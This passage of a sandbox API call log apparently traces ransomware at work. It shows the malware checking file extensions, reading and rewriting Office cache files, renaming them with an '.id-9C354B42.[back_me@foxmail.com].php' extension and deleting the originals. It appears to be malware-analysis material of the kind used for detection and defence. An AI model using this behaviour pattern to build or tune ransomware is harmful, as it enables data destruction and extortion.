(lpString1=".xlsx", lpString2="g.msi") returned -1 [0043.195] lstrlenW (lpString=".ppt") returned 4 [0043.195] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.195] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.195] lstrlenW (lpString=".zip") returned 4 [0043.195] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.195] lstrlenW (lpString=".rar") returned 4 [0043.195] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.195] lstrlenW (lpString=".bz2") returned 4 [0043.195] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.195] lstrlenW (lpString=".7z") returned 3 [0043.196] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.196] lstrlenW (lpString=".dbf") returned 4 [0043.196] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.196] lstrlenW (lpString=".1cd") returned 4 [0043.196] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.196] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.196] lstrlenW (lpString=".jpg") returned 4 [0043.196] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.196] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0043.196] lstrlenW (lpString="Office32MUI.msi") returned 15 [0043.196] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0043.196] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=873984) returned 1 [0043.196] CloseHandle (hObject=0x1e8) returned 1 [0043.198] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0043.199] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.199] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0043.199] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.199] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.199] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0043.199] GetLastError () returned 0x0 [0043.199] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xd5600, lpOverlapped=0x0) returned 1 [0043.868] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xd5610, lpOverlapped=0x0) returned 1 [0043.886] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.886] WriteFile (in: hFile=0x1b0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0043.886] SetEndOfFile (hFile=0x1b0) returned 1 [0043.886] CloseHandle (hObject=0x1b0) returned 1 [0043.895] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.895] SetEndOfFile (hFile=0x1e8) returned 1 [0044.250] CloseHandle (hObject=0x1e8) returned 1 [0044.250] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0044.251] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0044.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.251] lstrlenW (lpString=".doc") returned 4 [0044.251] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.251] lstrlenW (lpString=".docx") returned 5 [0044.251] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.251] lstrlenW (lpString=".pdf") returned 4 [0044.251] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.251] lstrlenW (lpString=".xls") returned 4 [0044.251] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.251] lstrlenW (lpString=".xlsx") returned 5 [0044.251] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.251] lstrlenW (lpString=".ppt") returned 4 [0044.251] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.251] lstrlenW (lpString=".zip") returned 4 [0044.251] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.251] lstrlenW (lpString=".rar") returned 4 [0044.251] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.251] lstrlenW (lpString=".bz2") returned 4 [0044.251] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.251] lstrlenW (lpString=".7z") returned 3 [0044.251] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.251] lstrlenW (lpString=".dbf") returned 4 [0044.251] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".1cd") returned 4 [0044.252] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".jpg") returned 4 [0044.252] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".doc") returned 4 [0044.252] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.252] lstrlenW (lpString=".docx") returned 5 [0044.252] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.252] lstrlenW (lpString=".pdf") returned 4 [0044.252] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.252] lstrlenW (lpString=".xls") returned 4 [0044.252] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.252] lstrlenW (lpString=".xlsx") returned 5 [0044.252] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.252] lstrlenW (lpString=".ppt") returned 4 [0044.252] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".zip") returned 4 [0044.252] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.252] lstrlenW (lpString=".rar") returned 4 [0044.252] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.252] lstrlenW (lpString=".bz2") returned 4 [0044.252] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.252] lstrlenW (lpString=".7z") returned 3 [0044.252] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".dbf") returned 4 [0044.252] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.252] lstrlenW (lpString=".1cd") returned 4 [0044.252] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.253] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0044.253] lstrlenW (lpString=".jpg") returned 4 [0044.253] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.253] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0044.253] lstrlenW (lpString="OWOW32LR.cab") returned 12 [0044.253] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0044.253] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=2928955) returned 1 [0044.253] CloseHandle (hObject=0x1e8) returned 1 [0044.253] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020 [0044.253] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.253] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0044.254] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0044.254] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.254] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.254] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.258] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.258] ReadFile (in: hFile=0x1e8, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.266] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.267] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.267] ReadFile (in: hFile=0x1e8, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.281] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.282] WriteFile (in: hFile=0x1e8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.770] SetEndOfFile (hFile=0x1e8) returned 1 [0044.771] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0044.776] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.776] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.778] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.778] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.783] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.783] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.785] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0044.785] CloseHandle (hObject=0x1e8) returned 1 [0045.219] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.219] lstrlenW (lpString=".doc") returned 4 [0045.219] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString=".docx") returned 5 [0045.219] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.219] lstrlenW (lpString=".pdf") returned 4 [0045.219] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString=".xls") returned 4 [0045.219] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString=".xlsx") returned 5 [0045.219] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.219] lstrlenW (lpString=".ppt") returned 4 [0045.219] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.219] lstrlenW (lpString=".zip") returned 4 [0045.219] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString=".rar") returned 4 [0045.219] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.219] lstrlenW (lpString=".bz2") returned 4 [0045.219] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.219] lstrlenW (lpString=".7z") returned 3 [0045.219] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.219] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.219] lstrlenW (lpString=".dbf") returned 4 [0045.220] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString=".1cd") returned 4 [0045.220] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString=".jpg") returned 4 [0045.220] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString=".doc") returned 4 [0045.220] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString=".docx") returned 5 [0045.220] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.220] lstrlenW (lpString=".pdf") returned 4 [0045.220] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString=".xls") returned 4 [0045.220] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString=".xlsx") returned 5 [0045.220] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.220] lstrlenW (lpString=".ppt") returned 4 [0045.220] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString=".zip") returned 4 [0045.220] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString=".rar") returned 4 [0045.220] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString=".bz2") returned 4 [0045.220] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.220] lstrlenW (lpString=".7z") returned 3 [0045.220] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.220] lstrlenW (lpString=".dbf") returned 4 [0045.220] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.221] lstrlenW (lpString=".1cd") returned 4 [0045.221] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0045.221] lstrlenW (lpString=".jpg") returned 4 [0045.221] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.221] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0045.221] lstrlenW (lpString="VisioLR.cab") returned 11 [0045.221] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.221] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=50823389) returned 1 [0045.221] CloseHandle (hObject=0x1e8) returned 1 [0045.221] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0045.221] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.222] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.222] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.222] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.222] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.261] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.261] ReadFile (in: hFile=0x1e8, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.264] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.264] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.264] ReadFile (in: hFile=0x1e8, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.569] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.569] WriteFile (in: hFile=0x1e8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0045.586] SetEndOfFile (hFile=0x1e8) returned 1 [0045.586] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0045.586] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.586] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.587] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.587] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, 